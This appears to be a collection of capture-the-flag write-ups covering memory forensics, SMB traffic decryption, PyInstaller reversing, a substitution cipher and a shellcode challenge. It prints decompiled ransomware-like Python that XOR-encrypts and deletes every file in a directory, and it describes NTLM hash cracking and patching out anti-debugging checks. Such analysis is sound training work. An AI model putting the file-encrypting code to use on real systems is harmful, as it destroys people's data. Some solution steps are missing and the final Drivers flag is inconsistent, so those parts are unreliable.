Unpacking and Decompiling:
Used pyinstxtractor to unpack the PyInstaller executable:
pyinstxtractor.py Crypt.exe
Decompiled the resulting .pyc file using PyLingual:
pylingual Crypt.pyc
Extracted Python Code: The decompiled Python code revealed the following logic:
import os
import requests
def fetch_key_from_pastebin(url):
try:
response = requests.get(url)
response.raise_for_status()
return response.text.strip()
except requests.exceptions.RequestException as e:
print(f'Error fetching key: {e}')
def xor_encrypt_decrypt(data, key):
key_bytes = key.encode('utf-8')
key_length = len(key_bytes)
return bytes([data[i] ^ key_bytes[i % key_length] for i in range(len(data))])
def process_file(file_path, key, encrypt=True):
try:
with open(file_path, 'rb') as file:
data = file.read()
processed_data = xor_encrypt_decrypt(data, key)
new_file_path = file_path + ('.oiiaiouiiiai' if encrypt else '')
with open(new_file_path, 'wb') as file:
file.write(processed_data)
os.remove(file_path)
print(f'Processed {file_path} -> {new_file_path}')
except Exception as e:
print(f'Failed to process {file_path}: {e}')
if __name__ == '__main__':
pastebin_url = 'https://pastebin.com/raw/PDXfh5bb'
key = fetch_key_from_pastebin(pastebin_url)
if not key:
print('Failed to retrieve the key.')
exit(1)
for file_name in os.listdir():
if os.path.isfile(file_name) and file_name != os.path.basename(__file__):
process_file(file_name, key, encrypt=False if file_name.endswith('.oiiaiouiiiai') else True)
Step 3: Retrieving the Flag
Key Extraction:
The script fetches an encryption key from Pastebin:
https://pastebin.com/raw/PDXfh5bb
Visiting this link revealed the flag.
Final Flag:
WGMY{8b9777c8d7da5b10b65165489302af32}
Final Answer
The retrieved flag is:
WGMY{8b9777c8d7da5b10b65165489302af32}
Summary
Memory Analysis: Used Volatility3 to identify and dump suspicious files from the memory dump.
Executable Analysis: Identified Crypt.exe as a PyInstaller-packed executable.
Unpacking and Decompilation: Used pyinstxtractor and PyLingual to extract and decompile the Python code.
Logic Analysis: Analyzed the Python script to understand its functionality and locate the encryption key.
Flag Retrieval: Accessed the Pastebin link to retrieve the flag.
Remarks/Tags/Lesson Learned
Memory Forensics: Volatility3 is effective for identifying and extracting suspicious files from memory dumps.
Executable Analysis: Recognizing PyInstaller-packed executables enables the use of appropriate unpacking and decompilation tools.
Python Reverse Engineering: Tools like pyinstxtractor and PyLingual streamline the analysis of Python-based malware.
Dynamic Analysis: Observing external connections (e.g., Pastebin links) in malicious scripts can lead directly to key insights.
Systematic Approach: Combining file analysis, decompilation, and network observation ensures a thorough investigation.
Oh Man - SMB Traffic Decryption with NTLM Hash
Description: We received a PCAP file from an admin who suspects an attacker exfiltrated sensitive data. Can you analyze the PCAP file and uncover what was stolen?
Solution
Files Provided
wgmy-ohman.pcap: A packet capture file containing encrypted SMB3 packets.
Tools Used
Wireshark: For analyzing and decrypting the SMB3 packets.
Packet Analysis: Used Wireshark and tshark to extract NTLMv2 hashes from the packet capture.
Password Cracking: Cracked the NTLM hash with hashcat to obtain the password.
Traffic Decryption: Decrypted SMB3 traffic in Wireshark using the cracked password.
File Recovery: Exported files sent via SMB and repaired the corrupted minidump file.
Flag Retrieval: Parsed the minidump file with pypykatz to extract the flag.
Remarks/Tags/Lesson Learned
SMB Decryption: Proper password recovery is essential for decrypting encrypted SMB traffic.
Network Forensics: Tools like Wireshark and tshark are invaluable for analyzing network traffic and extracting critical data.
Hash Cracking: Hashcat's performance and compatibility make it an excellent choice for NTLMv2 password cracking.
File Repair: Understanding file formats and repairing corrupted files can be key to retrieving essential information.
Dynamic Analysis: Leveraging tools like pypykatz allows efficient parsing of Windows memory artifacts.
Reverse
Stones - Pyinstaller Extraction
Description: When Thanos snapped his fingers, half of the flag was blipped. We need the Avengers to retrieve the other half. There's no flag in the movie, but there is a slash flag on the server (Please do not perform any brute forcing, enumeration, or scanning. Not useful nor needed)
Solution
Files Provided
stones.whatdis: A file containing an executable packed with PyInstaller.
Goals
Extract and analyze the Python code from the provided file.
Understand the logic for retrieving the flag.
Identify the correct date parameter and submit it to get the full flag.
Solution
Step 1: File Analysis
Initial Inspection:
Used the file and strings commands on stones.whatdis to identify it as a PyInstaller-packed executable.
This extracted Python bytecode files, including the main logic.
Decompiling Bytecode:
Used PyLingual to decompile the main .pyc file into readable Python source code.
Step 2: Extracted Python Code
The decompiled source revealed the following logic:
import requests
from datetime import datetime
from urllib.request import urlopen
server_url = 'http://13.58.69.212:8000/'
current_time = urlopen('http://just-the-time.appspot.com/')
current_time = current_time.read().strip()
current_time = current_time.decode('utf-8')
current_date = current_time.split(' ')[0]
local_date = datetime.now().strftime('%Y-%m-%d')
if current_date == local_date:
print("We're gonna need a really big brain; bigger than his?")
first_flag = 'WGMY{1d2993'
user_date = current_date
params = {'first_flag': first_flag, 'date': user_date}
response = requests.get(server_url, params=params)
if response.status_code == 200:
print(response.json()['flag'])
else:
print(response.json()['error'])
Key Observations:
The script queries a server at http://13.58.69.212:8000/ with two parameters:
first_flag: A known partial flag WGMY{1d2993.
date: A specific date required by the server.
The /flag endpoint must be queried with the correct date parameter to retrieve the full flag.
Step 3: Determining the Correct Date
Hint from the /flag Endpoint:
Accessing /flag on the server redirected to a YouTube video about the Avengers and the Time Stone.
The video’s upload date was 2022-07-24.
Adjusting the Date:
Submitting 2022-07-24 resulted in an error.
Incremented the date by one day (2022-07-25) and successfully retrieved the flag.
Final Date:2022-07-25
Step 4: Full Solve Script
Using the correct date, the script to retrieve the full flag is as follows:
import requests
# Parameters
server_url = 'http://13.58.69.212:8000/'
date = '2022-07-25'
first_flag = 'WGMY{1d2993'
params = {'first_flag': first_flag, 'date': date}
# Query the server
response = requests.get(server_url, params=params)
# Output the result
if response.status_code == 200:
print(response.json()['flag'])
else:
print(response.json()['error'])
Final Answer
The full flag is:
WGMY{1d2993fc6327746830cd374debcb98f5}
Summary
Executable Unpacking: Used pyinstxtractor to unpack the PyInstaller-packed executable.
Decompilation: Decompiled Python bytecode with PyLingual to recover the main logic.
Logic Analysis: Identified the server endpoint and parameters required for flag retrieval.
Date Adjustment: Determined the correct date parameter through observation and incremental testing.
Flag Retrieval: Submitted the correct parameters to retrieve the full flag.
Remarks/Tags/Lesson Learned
Executable Analysis: Recognizing PyInstaller artifacts and using appropriate tools like pyinstxtractor is crucial for unpacking.
Decompilation Tools: Tools like PyLingual simplify bytecode analysis, aiding in understanding the underlying logic.
HTTP Debugging: Observing server behavior and incremental testing can reveal subtle requirements for successful queries.
Problem Context: Incorporating hints (e.g., video upload date) into the solution ensures alignment with challenge themes.
Iterative Testing: Small adjustments, such as date changes, can resolve unexpected errors and lead to the correct solution.
Sudoku - Cryptogram-like Substitution Cipher
Description: Easy stuff, frfr. You dont need to brute force or guess anything. The final flag don't have any dot (.)
Solution
Files Provided
sudoku.zip:
out.enc: Encrypted flag file.
sudoku: Linux ELF executable.
Description
The challenge involves recovering an encrypted flag by analyzing a packed executable and utilizing reverse engineering to decrypt the data. The encryption uses a custom substitution cipher based on a randomly generated character map.
Goals
Extract and analyze the packed executable to recover its logic.
Reverse the substitution cipher used to encrypt the flag.
Reconstruct the complete flag.
Solution
Step 1: Analyzing the Executable
Initial Inspection:
Opened the sudoku executable in IDA.
Observed references to PyInstaller, indicating the file is packed.
Using the decryption map, processed the flag portion of the ciphertext:
encflag = "t728{09er1bzbs9sx5sosu7719besr39zscbx}"
flag = ''.join((decmap.get(c.lower(), c) for c in encflag))
print(flag)
Output:
wgmy{2ba914045b56c5e58..1b4a593b05746}
Step 4: Completing the Flag
Masked Characters:
Some characters in the decrypted flag (..) are placeholders. Using the pangram, determined that these placeholders correspond to missing hexadecimal characters.
Based on the ciphertext mapping, replaced the placeholders:
wgmy{2ba914045b56c5e58ff1b4a593b05746}
Validation:
Verified the flag's validity as a hexadecimal MD5 hash:
assert int(flag[5:-1], 16) # Ensure flag is valid hexadecimal
Final Answer
The reconstructed flag is:
wgmy{2ba914045b56c5e58ff1b4a593b05746}
Summary
Executable Unpacking: Used Pyinstxtractor to extract compiled Python files from the packed executable.
Decompilation: Decompiled sudoku.pyc using PyLingual to recover the source code.
Cipher Analysis: Analyzed the substitution cipher and created a reverse mapping based on known plaintext.
Flag Reconstruction: Used the reverse mapping to decrypt the flag and replace masked characters.
Reverse Engineering: Decompilation of Python bytecode is a valuable skill for analyzing packed executables.
Cryptanalysis: A known plaintext attack can efficiently break substitution ciphers.
Tool Proficiency: Tools like Pyinstxtractor and PyLingual streamline the process of extracting and analyzing Python-based executables.
Systematic Debugging: Step-by-step reconstruction ensures accuracy and completeness in flag recovery.
Drivers
Description: I downloaded these drivers which grants me more ram Though, it seems that its not working as expected, Could it be a virus?? Please help me!
Solution
Files Provided
The following relevant file is provided for this challenge:
InstallDrivers.ps1: A PowerShell script that executes a binary containing obfuscated shellcode.
Tools and Techniques Used
IDA Pro: Used for dynamic debugging and patching the binary to bypass anti-analysis checks.
shellcode2exe: Converted the shellcode to an executable for debugging.
Python (with itertools and pwntools): Scripted brute-forcing for missing flag components.
TQDM: Progress bar utility for tracking brute-force progress.
Steps to Solve
Step 1: Analyze the Shellcode
Convert the Shellcode:
Used shellcode2exe to wrap the shellcode into an executable format for easy debugging.
Debug the Binary in IDA:
Observed a series of anti-debugging checks.
Patched functions responsible for checking tools like IDA, Wireshark, and other debuggers by forcing them to return false.
Focused on functions causing premature exits and identified key functions dynamically loaded by the binary.
Registry Interaction:
Identified that the binary interacts with the registry to read two keys:
ProgramFilesDir (standard Windows directory key).
ProgramFilezDir (non-standard key with a z).
Core Logic:
The program constructs a 32-byte hexadecimal flag based on values from the binary and the registry.
Parts of the flag are hardcoded, but others depend on the ProgramFilezDir value, requiring brute-forcing.
Step 2: Reverse-Engineer the Flag Construction
Reverse Engineering:
Decompiled the binary to understand flag construction logic.
Found that the flag bytes are split into known and unknown indices:
Remaining values are dependent on ProgramFilezDir and must pass two hash checks.
Hash Validation:
Flag validation involves two FNV-1a hash checks:
The full flag hash must match 991905974.
The hash of the lower 16 bytes must match 2089661757.
Step 3: Brute-Force Missing Values
Script Setup:
Wrote a Python script to brute-force the unknown flag components using itertools.product.
Partial Brute Force:
Brute-forced the lower half of the flag first:
target = 2089661757
unknown_indexes = [16, 18, 21, 22, 26, 27, 28, 29]
for combo in product("0123456789abcdef", repeat=len(unknown_indexes)):
for i, c in enumerate(combo):
v6[unknown_indexes[i]] = ord(c)
if fnv1a_hash(v6[16:]) == target:
print("Found partial:", "".join(chr(v6[j]) for j in range(16, 32)))
break
Complete Brute Force:
Once partial values were found, brute-forced the remaining indices:
target = 991905974
unknown_indexes = [2, 4, 7, 11, 12, 13, 15]
for combo in product(b"0123456789abcdef", repeat=len(unknown_indexes)):
for i, c in enumerate(combo):
v6[unknown_indexes[i]] = c
if fnv1a_hash(v6) == target:
print(v6)
break
Step 4: Retrieve the Flag
Output Flag:
Once both parts passed their respective hash checks, the complete flag was assembled:
print("Flag:", f"wgmy{{{bytes(v6).decode()}}}")
Final Flag:
The final flag retrieved is:
Flag: wgmy{5233c60a01b0f0d372c39}
Conclusion
By combining dynamic debugging, reverse engineering, and brute-forcing, the challenge was solved effectively. The brute-force approach for registry values, while computationally expensive, was necessary due to the obfuscation in the binary. The use of FNV-1a hashing ensured the integrity of the solution.
Game
World 1 - RPG Maker MZ Save File Manipulation
Description: Game hacking is back! Can you save the princess? White screen? That is a part of the challenge, try to overcome it..
Solution
File Provided
World1.exe: An executable file for a game created using RPG Maker MZ.
Goals
Modify the save file to gain invincibility and obtain flags in the game.
Extract the game files to locate missing parts of the flag.
Reconstruct the full flag.
Solution
Step 1: Editing the Save File
Launch the game to create a save file, typically named file0.rmmzsave.
Open the save file using the RPG Maker MZ save editor tool:
The challenge involves hacking a game hosted on itch.io to retrieve a hidden flag. The game files are accessible via browser devtools, and the same strategy as previous challenges can be applied to solve it.
